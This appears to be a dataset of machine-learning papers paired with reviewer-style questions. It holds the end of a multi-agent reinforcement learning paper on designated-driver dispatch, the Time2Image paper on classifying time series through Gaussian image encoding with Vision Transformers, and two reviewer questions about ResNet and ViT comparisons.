drivers, the dimensions of the state vector are constantly changing, making it difficult to directly utilize by the value function. Therefore, we extract the distribution information of orders and drivers separately using the K-Means method. As shown in Table 2, such a state encoder can assist DRL algorithms in better understanding the state of the designated driving platform, particularly in extracting driver-order distribution information. Additionally, when comparing the performance of our algorithm without the state encoder and traditional DRL baselines that only utilize observation information, our algorithm still outperforms them due to the benefits of group-sharing and window-lasting interaction techniques. Reward Design. We compared different reward components by removing the neighborhood potential reward and move cost, as shown in Table 2. All reward settings were tested with our proposed group-sharing structure and training process. The dense potential reward not only increases performance but also stabilizes the training process, as indicated by the much smaller value function loss. While the model without the cost falls into a suboptimal situation where only order numbers are optimized, ignoring distance constraints. 5 CONCLUSION In this paper, we addressed the problem of driver dispatch in designated driving platforms, which is a complex scenario with sparsity issues and strict constraints. To capture the spatiotemporal dynamics of imbalanced demand-supply relations, we proposed a novel multi-agent deep reinforcement learning (DRL) algorithm based on the decentralized partially observed Markov decision process (Dec-POMDP) formulation. Our algorithm leverages a group-sharing structure and a specially designed reward to address the trade-off between sparsity, scalability, and heterogeneity. The window-lasting agent interaction technique enables our algorithm to handle the long-lasting cross-effect of agents. Through extensive experiments on a simulator based on real-world data, we demonstrated that our algorithm outperformed traditional optimization-based policies and existing DRL algorithms in terms of completed order numbers and moving constraints. The results highlight the effectiveness of our approach in addressing the challenges of the designated driver dispatch problem. In future work, we aim to make the grouping process trainable by incorporating self-supervised algorithms such as clustering. This would enable us to better model the interactions between agents and enhance the performance of our algorithm. Additionally, we are interested in studying the impact of non-compliance on the performance of driver dispatch, as existing literature often assumes drivers’ full compliance. Understanding and addressing non-compliance issues can further enhance the effectiveness of our algorithm in real-world scenarios. ETHICS STATEMENT During the data collection process, we filtered out all personal information regarding designated drivers and orders and used virtual IDs to prevent the leakage of behavior patterns. In the experimental design, we did not employ any discriminatory strategies towards any specific driver or order. Our optimization objective is to maximize the gross merchandise volume of the entire platform, thereby improving service quality while increasing workers’ income. REPRODUCIBILITY STATEMENT To facilitate reproducibility, we provide a detailed description of the models and training details in the main text. We also list all relevant parameters in the appendix. If the paper is accepted, we will provide an open-source link in the camera-ready version. REFERENCES Lina Al-Kanj, Juliana Nascimento, and Warren B Powell. Approximate dynamic programming for planning a ride-hailing system using autonomous fleets of electric vehicles. *European Journal of Operational Research*, 284(3):1088–1106, 2020. Yuri Burda, Harrison Edwards, Amos J. Storkey, and Oleg Klimov. Exploration by random network distillation. In *7th International Conference on Learning Representations, ICLR 2019, New Orleans, LA, USA, May 6-9, 2019*. OpenReview.net, 2019. BusinessGrowthReport. Global designated driving service market research report 2022. [https://www.businessgrowthreports.com/TOC/22043825](https://www.businessgrowthreports.com/TOC/22043825), 2022. Caroline Claus and Craig Boutilier. The dynamics of reinforcement learning in cooperative multiagent systems. In *Proceedings of the Fifteenth National/Tenth Conference on Artificial Intelligence/Innovative Applications of Artificial Intelligence, AAAI ’98/IAAI ’98*, pp. 746–752, USA, 1998. Soheil Sadeghi Eshkevari, Xiaocheng Tang, Zhiwei Qin, Jinhan Mei, Cheng Zhang, Qianying Meng, and Jia Xu. Reinforcement learning in the wild: Scalable RL dispatching algorithm deployed in ridehailing marketplace. In *KDD ’22: The 28th ACM SIGKDD Conference on Knowledge Discovery and Data Mining, Washington, DC, USA, August 14 - 18, 2022*, pp. 3838–3848, 2022. Yannis Flet-Berliac and Philippe Preux. Only relevant information matters: Filtering out noisy samples to boost RL. In Christian Bessiere (ed.), *Proceedings of the Twenty-Ninth International Joint Conference on Artificial Intelligence, IJCAI 2020*. ijcai.org, 2020. Sriram Ganapathi Subramanian, Pascal Poupart, Matthew E. Taylor, and Nidhi Hegde. Multi type mean field reinforcement learning. In *Proceedings of the 19th International Conference on Autonomous Agents and MultiAgent Systems*, AAMAS ’20, pp. 411–419, Richland, SC, 2020. Guy Hacohen and Daphna Weinshall. On the power of curriculum learning in training deep networks. In Kamalika Chaudhuri and Ruslan Salakhutdinov (eds.), *Proceedings of the 36th International Conference on Machine Learning, ICML 2019, 9-15 June 2019, Long Beach, California, USA*, volume 97 of *Proceedings of Machine Learning Research*, pp. 2535–2544. PMLR, 2019. J. A. Hartigan and M. A. Wong. A k-means clustering algorithm. *Journal of the Royal Statistical Society: Series C (Applied Statistics)*, 28(1):100–108, 1979. Dan Hendrycks and Kevin Gimpel. Bridging nonlinearities and stochastic regularizers with gaussian error linear units. *CoRR*, abs/1606.08415, 2016. Eric Jang, Shixiang Gu, and Ben Poole. Categorical reparameterization with gumbel-softmax. In *5th International Conference on Learning Representations, ICLR 2017, Toulon, France, April 24-26, 2017, Conference Track Proceedings*. OpenReview.net, 2017.
LegZeFYugN
What are the author’s intuitions for why Time2Image underperforms the regular ResNet? Is there something about the Gaussian representation that is particularly suited to Transformers over Convulational approaches?
TIME2IMAGE: A UNIFIED ADAPTIVE IMAGE REPRESENTATION FRAMEWORK FOR TIME SERIES CLASSIFICATION Anonymous authors Paper under double-blind review ABSTRACT Time Series Classification (TSC) is a crucial and challenging task that holds significant importance across various domains, of which one of the kernel ingredients is to construct a suitable time series representation for better feature capture. However, extracting informative and robust time series representation with good generalization potential is still a challenging problem. To address this issue, we propose Time2Image, a novel image-based representation framework for TSC. At the heart of our framework is a proposed Adaptive Time Series Gaussian Mapping (ATSGM) module for robust time series encoding in 2D image structure, based on which we employ Vision Transformer (ViT) for subsequent classification tasks considering its prominent long-dependency modeling capability. Experiments were conducted on all 158 public time series datasets from UCR/UEA covering diverse domains, among which our method achieves top 1 performance in 86 datasets compared with existing State-Of-The-Art (SOTA) deep learning-based methods. In addition, our framework flexibly allows handling both univariate and multivariate time series with unequal length across different domains and takes inherent advantage of generalization ability due to our proposed ATSGM representation method. The source code will be publicly available soon. 1 INTRODUCTION Time series classification (TSC) is recognized as a classic but challenging task in data mining (Esling & Agon [2012]), which aims to assign predefined labels to chronologically arranged data of both Univariate Time Series (UTS) and Multivariate Time Series (MTS) according to the number of channels of the sample. It can be widely applied across diverse fields in finance (Xiu et al., 2021; Chao et al., 2019), healthcare (Chambon et al., 2018), transportation (Gupta et al., 2020), etc. Over the past few years, TSC algorithms can be mainly concluded into 3 categories: (i) Traditional machine learning models (Formisano et al., 2008; Bagnall et al., 2017) use various feature extraction techniques for statistic (Lin et al., 2012; Li et al., 2018), frequency (Baydogan et al., 2013), sequence (Chen et al., 2021) or shapelet (Ye & Keogh, 2009; Grabocka et al., 2014) feature capturing combined with traditional classification methods (Xue et al., 2019) like SVM, KNN, etc. (ii) Deep learning models (Chen & Shi, 2019; Ruiz et al., 2021) have automatic feature learning ability through neural network models to achieve more substantial expressive power compared with traditional methods. Typical algorithms for sequence modeling ability including RNN, LSTM, especially Transformer-related models based on attention mechanism on long-term dependencies capturing. (iii) Ensemble models (Lines et al.) integrate the results by combining multiple base classifiers to improve classification performance. However, existing algorithms are only suitable for either UTS or MTS with heavy feature engineering and hyperparameter tuning, which brings subjectivity to the model. Unlike the above models which extract time series representation based on original time series data, in recent years, increasing attention has been focused on transformation-based time series representation (Bagnall et al., 2012). These methods model time series data with specific data structure for informative feature extraction, among which time series image representation has become one of the active areas in recent years with the rapid development and achievements of image classification algorithms in computer vision (Chen & Shi, 2019). The motivation behind image representation is to convert time series into images to reformat the data for effective pattern detection to strengthen the expressive power of the data by leveraging experience in image feature extraction. However, current image representation methods suffer from poor generalization, which can be reflected in two aspects: from the data perspective, current approaches are only effective in specific time series datasets or in certain domains; from the model perspective, existing image representation methods cannot be applied to both UTS and MTS. Even though some models can be adopted on MTS, many of them cannot be used when the lengths of time series are inconsistent. Therefore, our goal of this work is to propose a novel time series image representation framework that not only has a better comprehensive performance compared with existing deep learning SOTA algorithms but also has the inherent generalization ability to both UTS and MTS with inconsistent length. In this paper, we proposed a unified adaptive image representation framework for time series classification called Time2Image. In our framework, Adaptive Time Series Gaussian Mapping (ATSGM) is first introduced to convert time series into an image consisting a collection of mixed Gaussian images where the image number equals the length of the time series data. Moreover, each mixed Gaussian image is jointly constructed based on a specific two-dimensional Gaussian distribution and the values of the time series data at a certain time point. By converting the projection of the time series data into an ‘equal circle in a square’ problem, the optimal value of the specific Gaussian distribution parameters and the position of each channel in the image can be obtained given channel number and image size. After that, the time series classification is converted into an image classification problem, and the vision transformer algorithm is adopted with the help of its long-term dependency-capturing ability. This design enables spatial structure construction of time series through image representations and can be generalized to both UTS and MTS with unequal lengths. Overall, the contributions can be summarized as follows: - Adaptive Time Series Gaussian Mapping (ATSGM) module is proposed for robust time series encoding in 2D images, which can be generalized to both UTS and MTS. - The vision transformer adopted in Time2Image is the first attempt at a time series classification task. - We validate the effectiveness of our approach based on all 158 public datasets from UCR/UEA. Experimental results show that our approach achieves notably superior performance compared with SOTA baselines. 2 RELATED WORK 2.1 TIME SERIES TRANSFORMATION METHODS With the accumulation of time series data in various domains, transforming time series into alternative representations has become crucial for advanced analysis tasks as a way to improve the expressive power of original data (Lacasa et al., 2015; Meintjes et al.). Graph-based transformation method is a flexible framework to capture complex interrelationships and dependencies within a time series (Cheng et al., 2020). Techniques such as Visibility graph (Xiu et al., 2022), Recurrence network (Donges et al., 2012), and Transition network (Makaram et al., 2021) are available for time series modeling. Under this framework, graph theory and network science can be adopted for further tasks but constructing a graph is computationally expensive, especially for long time series data. Moreover, symbolic sequence representation aims to simplify continuous time series data into discrete symbols based on predefined rules. A Method like Symbolic Aggregation approXimation (SAX) (Senin & Malinchik, 2013) is proposed for representation, which allows the utilization of symbolic analysis, but it will inevitably lose detailed information and the selection of the parameters is subjective. In the meantime, numerical transformation includes Fourier Transform (Zhao et al., 2017), Wavelet Transform (Chaovalit et al., 2011), etc. endeavor to execute mathematical operations for spectral component capturing or features from different scales, but the estimation and selection of suitable transformation functions can also be subjective. In addition to the above methods, image-based representation has gained popularity in recent years with the development of computer vision. Existing image-encoder methods (Li et al., 2021; Wang & Oates, 2015; Chen & Shi, 2019) for time series include Gramian Angular Field (GAF), Markov Transition Field (MTF), Recurrence Plots (RP), etc. Phase relationships, recurrence patterns, and frequency-related features can be captured through current techniques. Since there is a significant gap between the existing time series image representation method for classification and the SOTA models on the TSC task, we propose a new time series image representation method in this paper. 2.2 IMAGE CLASSIFICATION When it comes to image classification, various deep learning architectures have emerged as state-of-the-art models for image classification. Existing architectures can be concluded into 2 categories: Convolutional Neural Networks (CNNs) (Esling & Agon [2012], Li et al., [2021]) based models and Transformer based models (Dosovitskiy et al., [2021]). CNNs have revolutionized this field, achieving remarkable results by effectively capturing local spatial dependencies through convolutional layers and hierarchical features via pooling and stacking operations, of which ResNet (He et al., [2016]) is a typical model of CNN-based models. More recently, attention mechanisms have gained attention in image classification research. After that, the emergence of ViT from Google proposed in 2021 (Dosovitskiy et al., [2021]) indicates that the transformer-based models have officially entered the field of image classification. However, ViT has never been applied to TSC tasks before. Since it has a good long-dependence modeling capability, it should have great potential to be applied to temporal data. In this work, by converting time series into image, we transform the time series classification into image classification and utilize vision transformer for further tasks. 3 PRELIMINARY Let \( \chi_N = \{ X^N_D \}_{d=1}^{D} \) be the \( N^{th} \) multivariate time series data with the dimension of \( D \). \( X_D \in \mathbb{R}^{D \times T} \) refers to the \( D^{th} \) channel of time series and \( X_D = \{ x_{d_1}, x_{d_2}, \ldots, x_{d_T} \} \). For \( \forall \chi, D \) and \( T \) represent the channel and the length of the time series, respectively. Let \( Y_N \in \mathbb{N^K} \) be the corresponding label of the \( N^{th} \) sample of the time series, where \( K \) indicates the number of classes. All channels in \( X_N \) share the same label \( Y \). We choose the definition of multivariate time series as the general definition of both univariate and multivariate time series data since univariate time series can be regarded as the special case of multivariate ones when \( D = 1 \). In this study, we focus on time series classification by transforming the original time series into an image (Time2Image). Our Time2Image consists of two stages: Adaptive Time Series Gaussian Mapping (ATSGM) for image representation and classification. **Definition 1 Patch.** A patch refers to a small rectangular or square region extracted from the input image, which can be mathematically represented as a matrix or a vector. It is a fundamental unit in computer vision, which plays a vital role in local feature encoding and analysis. In addition, the shape and size of the patch are adaptable based on the application and models we adopt, of which smaller patches reflect fine-grained details while larger patches encompass a broader context. In this work, the patch \( P_t \) is defined as the image representation of the time series at time \( t \), which is a \( 16 \times 16 \) matrix since the classification method we adopt is ViT-B/16. **Definition 2 Sub-patch.** A sub-patch is defined as the subsection of the patch in definition 1. As for MTS, the image representation of the time series in one channel is a sub-patch. Therefore, the number of sub-patch of a MTS sample equals the number of channels. Therefore, UTS can be regarded as a special case of MTS, of which the sub-patch and patch are the same. 4 TIME2IMAGE FRAMEWORK In this section, a novel time series image representation framework is introduced for time series modeling. We name the proposed framework as Time2Image, which transforms time series into an image. The framework can be seen in Figure 1, from which we use \( D=6 \) as an example. 4.1 DATA PREPROCESSING Data preprocessing plays a critical role in preparing the time series data for classification tasks. In this framework, the data preprocessing involves two techniques, which are standardization and resizing. For time series data of each channel in MTS, standardization is first conducted separately to align data to a common scale and distribution so as to ensure different time series from different Figure 1: Time2Image Framework (1) Pre-processing: use standardization and resize to let MTS to equal-length MTS and L=196 (2) ATSGM: Gaussian mapping to model time series into a mixed Gaussian distribution as image representation (3) Use the image generated from ATSGM for image classification task. channels are comparable. \[ S_{D,T}^N = \frac{X_{D,T}^N - \mu_X^N}{\sigma_X^N} \] (1) where \( \mu \) and \( \sigma \) are the mean and standard deviation of the time series, respectively. After that, cubic interpolation is adopted for each channel to deal with varying sequence lengths within the time series to create a consistent representation. Since the estimation process is determined through smooth cubic polynomial, it provides more accurate results, especially for complex time series data with nonlinear variations compared to simpler interpolation methods such as linear interpolation and quadratic interpolation. 4.2 Adaptive Time Series Gaussian Mapping (ATSGM) ATSGM is a crucial component of our proposed framework for time series image representation, which addresses the challenge of extracting informative and robust representations from time series data with the goal of achieving better feature capture. Our goal is to obtain an image representation of the corresponding values of all channels at a certain time. The overall process of ATSGM can be shown in Figure 2, which involves transforming the time series at a certain time with different channels into a sequence of mixed Gaussian distributions ordered by sequence. These distributions are then used to create a sub-patch representation, where the mean and standard deviation of the Gaussian distribution correspond to the specific value through mathematical derivation based on the number of channels of MTS, which is illustrated in Section 4.2.1. The summation of the sub-patch representation is conducted and the patch representation is reached for time series at time \( t \). All obtained patches are arranged in chronological order into \( 16 \times 16 \) patches as the image representation of MTS as the input for the image classification algorithm. The intuition of the ATSGM is to preserve the statistical properties of time series through Gaussian distributions and obtain a smooth two-dimensional representation. The following subsection will give a detailed description of the method. 4.2.1 Time Series Image Representation Existing research on image representation mainly considers the relative value by simply getting the difference between different time steps, but here we consider a two-dimensional Gaussian distribution in which the covariance matrix is zero in default and the two standard deviations are equal. Therefore, the projection of this Gaussian distribution is a circle in the plane, where the radius of the circle equals the standard deviation of the Gaussian distribution. Moreover, the mean \( \mu_x \) and \( \mu_y \) can be regarded as the coordination of the center of the circle. After that, the projection value of 2D Gaussian distribution is constructed as the sub-patch matrix, of which the length and size of the patch are predefined as a \( 16 \times 16 \) matrix with the length of each patch equals 6, and the value is defined in a range [-3,3]. The value of the fundamental Gaussian distribution for the sub-patch matrix can be obtained through the following equation. Figure 2: Time series image representation (a) Sub-patch: For pre-processed multivariate time series data, use ATSGM to get gaussian mapping of each channel at a certain time stamp (b) Patch: Do summation of sub-patch from all channels at a certain time stamp to get the patch at a certain time stamp (c) Image: Patches combined with position encoding connected in chronological order to get the final image \[ f(x, y) = \frac{1}{2\pi\sigma^2} \exp \left[ -\frac{1}{2} \left( \frac{(x - \mu_x)^2}{\sigma^2} + \frac{(y - \mu_y)^2}{\sigma^2} - \frac{2(x - \mu_x)(y - \mu_y)}{\sigma^2} \right) \right] \] Where \( f(x, y) \) stands for the matrix value at \((x, y)\), \( \mu_x, \mu_y \) and \( \sigma \) refers to the mean and standard deviation of the distribution, respectively. Since the projection of 2D Gaussian distribution is a circle in the plane, the relationship between the area of the circle and the standard deviation of Gaussian distribution can be derived as: \[ S_{\text{circle}} = \pi R_D^2 = \pi(\sigma)^2 \] where \( R_D \) is the radius of the circle in a \( D \)-channel times series, from which we can obtain that the radius equal to the standard deviation of 2D Gaussian distribution. Here adaptive from ATSGM refers to the adjustable of the standard deviation, that is to say, we can get the representation with different information by setting different values of standard deviation. The smaller the standard deviation, the more information is captured from Gaussian mapping. According to '3 sigma' principle, we can derive the corresponding relationship between \( R_D \) and the value of standard deviation as follows: - When \( \sigma = R_D \), about 68% of the information can be represented within the circle. - When \( \sigma = R_D/2 \), about 95% of the information can be represented within the circle. - When \( \sigma = R_D/3 \), about 99% of the information can be represented within the circle. Therefore, the projection value \( V_{d,t} \) of channel \( d \) at time \( t \) in the coordination of sub-patch matrix \((x,y)\) is defined as: \[ V_{d,t}(x, y) = f(x, y) \times S_{d,t} \] Where \( S_{d,t} \) is the preprocessed time series value at time \( t \). After the calculation of all data points, the characteristic of the randomness of the time series data point for each channel can be captured. Here we use the Gaussian distribution to describe the randomness of the value, adjust the range and strength of the Gaussian distribution by multiplying the normalized specific value of the time series data, and use the adjusted distribution of each dimension as the binary value under timestep dimensional representation to improve the stability and robustness of the method. 4.2.2 Sub-patch Position Determination From the construction process of ATSGM above, we can conclude that for UTS, the optimal time series image representation can be obtained when the center of the projected circle is located at the center of the sub-patch and the diameter equals the length of the sub-patch. However, when it comes to MTS, the projection position needs to be determined first for each channel. Since the projection of 2D Gaussian distribution is a circle in the plane, we can regard it as a packing problem, which is to find the best packings of equal circles in a square. In fact, the “equal circle in a square” is a mathematical puzzle that involves finding the largest possible circle that can fit inside a given square, such that the circle’s diameter is equal to the side length of the square. In other words, the goal is to determine the maximum-sized circle that can be inscribed within the square. Website\footnote{http://hydra.nat.uni-magdeburg.de/packing/csq/csq.html} shows the best-known packings of equal circles in a square from N=1 to 10000, including the optimal radius ($r_d$) and the corresponding coordinates ($c_d$) of each circle given $N$ when the length of the square is 1. In our work, N equals the number of channels in MTS. Therefore, the radius and coordinates can be obtained as: $$R_d = r_d \times 6$$ $$C_d = (c_{dx} \times 6, c_{dy} \times 6)$$ After finding out the optimal radius of the patch, the optimal parameters of Gaussian distribution can be determined, of which the $\mu_x$ and $\mu_y$ equal the coordinates from Equation 6, and the standard deviation can also be obtained through Equation 3. After the determination of the parameters, the distribution of Gaussian will be finally determined for each sub-patch representation. The patch representation of time step $t$ is achieved by summing all sub-patch representations at a certain time step, which is shown in Equation 6. The image representation is the arrangement of different Patches ordered by sequence. $$P_t(x, y) = \sum_d V_{d,t}(x, y)$$ The pseudo-code of ATSGM can be seen in Algorithm 1 for better understanding. Through the above steps, ATSGM is able to convert time series data into an image representation with spatial structure. This image representation can better capture the characteristics of time series data, especially the local characteristics of different channels of time series at the same time point, and provide more reliable input for subsequent image-based models. **Algorithm 1 ATSGM** **Input:** time series $X = [X^1, X^2, ..., X^D]$ consists of $D$ different channel with $X^D = [x_1^D, x_2^D, ..., x_i^D]$, where $x_i^D$ is the value of variable $D$ at time step $i$ and the time series length is $t$ **Output:** a $224 \times 224$ matrix $N$ 1: Resize the Time Series & Normalization 2: For every variable, resize its length to 196: $X^{D \times T} \rightarrow X^{D \times 196}$ 3: Transformation 4: Initialize $P$ as an empty matrix with the shape of $D \times 196 \times 16 \times 16$, generate the gaussian matrix list $\Phi^{D \times 16 \times 16}$ according to the number of variable $D$ 5: for $i \in D$ do 6: for $j \in L$ do 7: $P_i^j = X_j^i \cdot \Phi_i$ 8: end for 9: end for 10: Reshape $P$ 11: $P^{D \times 224 \times 224} \leftarrow P^{D \times 196 \times 16 \times 16}$ 12: Suppression $P$ in the dimension-0 13: $P^{224 \times 224} \leftarrow P^{D \times 224 \times 224}$ 4.3 Classification Model Vision Transformer is a classical transformer-based image classification algorithm proposed in 2021 [Dosovitskiy et al., 2021], which is prominent for its global feature extraction and long-dependency modeling capability because of multi-head attention. In our work, we adopt ViT-B/16 to do the image classification task with the input from our proposed time series image representation. 5 Experiment 5.1 Experimental Setting 5.1.1 Datasets The whole UCR/UEA archive [Chen et al., 2015] is utilized to test the performance of our proposed method, which includes 128 UTS Datasets and 30 MTS Datasets. This archive is a well-known and widely used classic public dataset in time series classification. It contains 158 time series datasets in total covering different scenarios with predefined train/test split, including 128 UTS Datasets and 30 MTS Datasets. Moreover, the number of classes in this archive ranges from 2 to 60. In addition, there are 4 MTS Datasets that have unequal lengths in different channels. The summary of these datasets can be seen in Appendix A, which shows detailed information including the size of the training and testing set, channel, length, class numbers, and domains of each dataset. By testing our algorithm on all datasets and comparing it with baseline models, the performance can be obtained for further analysis. 5.1.2 Baselines Several comparison algorithms including SOTA methods are deployed to show the effectiveness of the proposed model. According to Ismail Fawaz et al. (2020), as for UTS, InceptionTime, FCN and ResNet achieve top 1 performance on 69.4% of the datasets by comparing 9 deep learning models, so these models are chosen as the baseline for the UTS classification task. When it comes to MTS, we choose five state-of-the-art multivariate time series classification models as our baselines: Hierarchical VoTE Collective of Transformation-based Ensembles (HIVE-COTE) [Lines et al., 2017], Canonical Interval Forest (CIF) [Middlehurst et al., 2020], RandOm Convolutional KErnel Transform (ROCKET) [Dempster et al., 2020], InceptionTime [Ismail Fawaz et al., 2020] and ResNet [He et al., 2016]. HIVE-COTE, CIF, ROCKET, and InceptionTime, which are more accurate than other classifiers experimented on in the UEA archive by Ruiz et al. (2021). To show the effectiveness of the ATSGM of our framework, we also conducted the experiment to replace our following classifier from ViT to ResNet to find out the performance of the current two typical classification architectures from computer vision. 5.1.3 Implementation ViT-B/16 is adopted as the following classifier for time series image representation. Therefore, the length of all time series data equals 196 (L=196). For MTS, we set the circle area of each channel to encompass the information within a 2-standard-deviation range of the predefined 2D Gaussian distribution derived from section 3, that is to say, $\sigma = R/2$ according to section 4. Moreover, we stick to the original training and testing set split for all datasets. All the test datasets were trained for 200 epochs. In the meantime, the value of hyper-parameters from ViT is set by default according to [Dosovitskiy et al., 2021]. The experiment of Time2Image is replicated for 5 times of each dataset with different random seeds and the value of the random seed is 0,1,2,3 and 4. 5.1.4 Evaluation Indicator We use accuracy through 5 replicate tests and calculate the average as our evaluation indicator for performance evaluation so as to make the comparison between our proposed method and the baseline models. 5.2 Performance Analysis We did extensive experiments on the whole UCR/UEA Archive and the experimental result will be analyzed in this section. Due to page limitations, the classification accuracy of all data sets will be fully disclosed in Appendix B. The corresponding critical difference diagrams are drawn based on the performance of each dataset, which illustrates multiple pieces of information that can help make a comparison of the performance of different algorithms on multiple datasets and are shown in Figure 3 and Figure 4. As for the performance comparison between Time2Image and baselines, it can be seen that our proposed framework has the best performance on both UTS and MTS datasets, indicating the generalization ability of the proposed algorithm. Moreover, Time2Image significantly outperforms other baselines with an average rank of 1.8945 in the UTS Dataset, which wins on 73 problems out of 128 and significantly outperforms ResNet from Table 1. In addition, the performance of MTS also achieved top 1 performance compared with other baselines. Table 1: Number of different time series image representation algorithms | Data Type | Total # | Win_# Time2Image | Win_# FCN | Win_# ResNet | Win_# ROCKET | Win_# CIF | Win_# HIVE-COTE | Win_# InceptionTime | |-----------|---------|------------------|-----------|--------------|-------------|----------|-----------------|---------------------| | UTS | 128 | 73 | 12 | 41 | | | | | | MTS | 30 | 13 | 3 | 4 | 3 | 2 | 5 | | Figure 3: Critical difference diagram of UTS Dataset Since there are some existing time series image representation methods, we also did comparison experiments on different time series image representations. GAF, MTF, and RP are universally adopted image representation methods of UTS, so we chose them for comparison, and the result can be seen in Figure 3. From the figure, it can be seen that none of the existing image representation methods can defeat baseline models. This indicates a huge research gap for time series representation for TSC, which is consistent with the current research status, but our proposed method is significantly better than not only other image representation methods but also all baselines, which provides an alternative TSC algorithm and showing a promising direction on time series image representation and providing an alternative solution on TSC task. Figure 4: Critical difference diagram of MTS Dataset In addition, to explore whether the choice of different image classification models will impact the performance, we also did an experiment on ResNet, which is a typical CNN architecture model, to replace ViT for comparison. According to the result in Figure 3, it can be seen that our proposed framework is better than all other image representation models but not as good as SOTA, which illustrates the importance of long-range information for temporal classification and the superiority of ViT in capturing long-range information. Nevertheless, the ATSGM method we proposed still has significant advantages over other image representation learning for time series image representation, which also explains the effectiveness of our proposed ATSGM method to a certain extent. Table 2: Classification results grouped by domains | Category | Time2Image | FCN | ResNet | Time2Image_Win | FCN_Win | ResNet_Win | |----------------|------------|-------|--------|----------------|---------|------------| | Device(9) | **75.96%** | 70.91%| 71.16% | 4 | 3 | 2 | | ECG(6) | 94.67% | 92.91%| **94.98%** | 2 | 1 | 3 | | EOG(2) | **57.98%** | 42.85%| 55.06% | 1 | 0 | 1 | | EPG(2) | 99.76% | **100.00%** | **100.00%** | 0 | 1 | 1 | | Hemodynamics(3)| **83.32%** | 36.63%| 62.79% | 1 | 0 | 2 | | HRM(1) | **99.68%** | 78.06%| 98.49% | 1 | 0 | 0 | | Image(32) | **83.32%** | 78.16%| 82.89% | **17** | 1 | 14 | | Motion(17) | **81.99%** | 78.03%| 81.91% | 8 | 2 | 7 | | Power(1) | **98.22%** | 90.00%| 88.89% | 1 | 0 | 0 | | Sensor(30) | **84.26%** | 60.73%| 63.73% | **21** | 1 | 8 | | Simulated(8) | 94.91% | 88.79%| **98.14%** | 4 | 3 | 1 | | Spectro(8) | **84.67%** | 66.80%| 81.13% | 5 | 0 | 3 | | Spectrum(4) | **79.89%** | 52.44%| 62.28% | 4 | 0 | 0 | | Traffic(2) | **94.36%** | 54.06%| 54.03% | 2 | 0 | 0 | | Trajectory(3) | **59.90%** | 55.61%| 56.33% | 2 | 0 | 1 | To test whether it can be regarded as a unified framework, performance grouped by different domains is also conducted to find out the generalization of the model. Table 2 shows the algorithms’ performance with respect to the domain of the datasets. We take the domains defined by Bagnall et al. (2017) for UTS Datasets. From the table, it can be concluded that 128 datasets can be categorized into 15 domains. The first 3 columns show the average accuracy between Time2Image and baselines within the same domain and the remaining columns calculate the winning number of datasets for each model. From the table, it can be obtained that Time2Image achieves top 1 performance on 12 out of 15 domains, indicating the inherent generalization ability of Time2Image. 5.3 Parameter Analysis From the methodology, it can be seen that our methodology is an adaptive algorithm, that is to say, the parameter, especially the value of the standard deviation ($\sigma$) of Gaussian distribution seems to have an impact on the performance. In order to explore the influence of the value of the standard deviation on the performance of the model, we record the accuracy of all data sets with different standard deviation values which can be seen in Appendix C. Here we calculate the mean of the values from Appendix C of the whole datasets to indicate the final performance of the model and the results are shown in Figure 5. From the result, it can be concluded that when $\sigma = \frac{R}{2}$, the performance of the model is the best, but the difference is not that large, of which the variance is 0.37 on average, indicating the robustness of our proposed algorithms. 6 Conclusion In this work, a general time series image representation algorithm (Time2Image) was proposed, which is not only suitable for both UTS and MTS but also does a good job on non-stationary and unequal-length data. We validate the effectiveness of our approach based on all 158 public datasets from UCR/UEA. Through extensive experiments, our approach achieves notably better performance. when compared with SOTA baselines, which could be a potential solution for future time series images. ACKNOWLEDGMENTS We would like to express our sincere gratitude to all the reviewers and the public for your time and interest in our work. We welcome all valuable feedback and suggestions on our paper, and we think any insightful comments and constructive critiques can make this paper better. REFERENCES Anthony Bagnall, Luke Davis, Jon Hills, and Jason Lines. Transformation based ensembles for time series classification. In Proceedings of the 2012 SIAM International Conference on Data Mining (SDM), Proceedings, pp. 307–318. Society for Industrial and Applied Mathematics, 2012. doi: 10.1137/1.9781611972825.27. Anthony Bagnall, Jason Lines, Aaron Bostrom, James Large, and Eamonn Keogh. The great time series classification bake off: a review and experimental evaluation of recent algorithmic advances. Data Mining and Knowledge Discovery, 31(3):606–660, 2017. Mustafa Gokce Baydogan, George Runger, and Eugene Tuv. A bag-of-features framework to classify time series. IEEE Transactions on Pattern Analysis and Machine Intelligence, 35(11):2796–2802, 2013. Stanislas Chambon, Mathieu N. Galtier, Pierrick J. Arnal, Gilles Wainrib, and Alexandre Gramfort. A deep learning architecture for temporal sleep stage classification using multivariate and multimodal time series. Ieee Transactions on Neural Systems and Rehabilitation Engineering, 26(4):758–769, 2018. Luo Chao, Jiang Zhipeng, and Zheng Yuanjie. A novel reconstructed training-set SVM with roulette cooperative coevolution for financial time series classification. Expert Systems with Applications, 123:283–298, 2019. Pimwadee Chaovalit, Aryya Gangopadhyay, George Karabatis, and Zhiyuan Chen. Discrete wavelet transform-based time series analysis and mining. ACM Computing Surveys, 43(2):1–37, 2011. Wei Chen and Ke Shi. A deep learning framework for time series classification using relative position matrix and convolutional neural network. Neurocomputing, 359:384–394, 2019. Yanping Chen, Eamonn Keogh, Bing Hu, Nurjahan Begum, Anthony Bagnall, Abdullah Mueen, and Gustavo Batista. The UCR time series classification archive, 2015. URL www.cs.ucr.edu/~eamonn/time_series_data/. Zhi Chen, Yongguo Liu, Jiajing Zhu, Yun Zhang, Rongjiang Jin, Xia He, Jing Tao, and Lidian Chen. Time-frequency deep metric learning for multivariate time series classification. Neurocomputing, 462:221–237, 2021. Ziqiang Cheng, Yang Yang, Wei Wang, Wenjie Hu, Yueting Zhuang, and Guojie Song. Time2graph: Revisiting time series modeling with dynamic shapelets. Proceedings of the AAAI Conference on Artificial Intelligence, 34(4):3617–3624, 2020. Angus Dempster, François Petitjean, and Geoffrey I. Webb. ROCKET: exceptionally fast and accurate time series classification using random convolutional kernels. Data Mining and Knowledge Discovery, 34(5):1454–1495, 2020. Jonathan F. Donges, Jobst Heitzig, Reik V. Donner, and Jürgen Kurths. Analytical framework for recurrence network analysis of time series. Physical Review E, 85(4):046105, 2012. Alexey Dosovitskiy, Lucas Beyer, Alexander Kolesnikov, Dirk Weissenborn, Xiaohua Zhai, Thomas Unterthiner, Mostafa Dehghani, Matthias Minderer, Georg Heigold, Sylvain Gelly, Jakob Uszkoreit, and Neil Houlsby. An image is worth 16x16 words: Transformers for image recognition at scale, 2021.
4aJg9e4nvF
In table2, multiple ViT models and CNN models are compared to show that the ViTs are better at using background information to predict correct classes. The issue here is that the used ViTs are more powerful than the CNNs with more parameters and more computations. ViTs have consistently better classification accuracies. The comparison is not fair and thus the conclusion of “ViTs better at using background information” is not convincing.
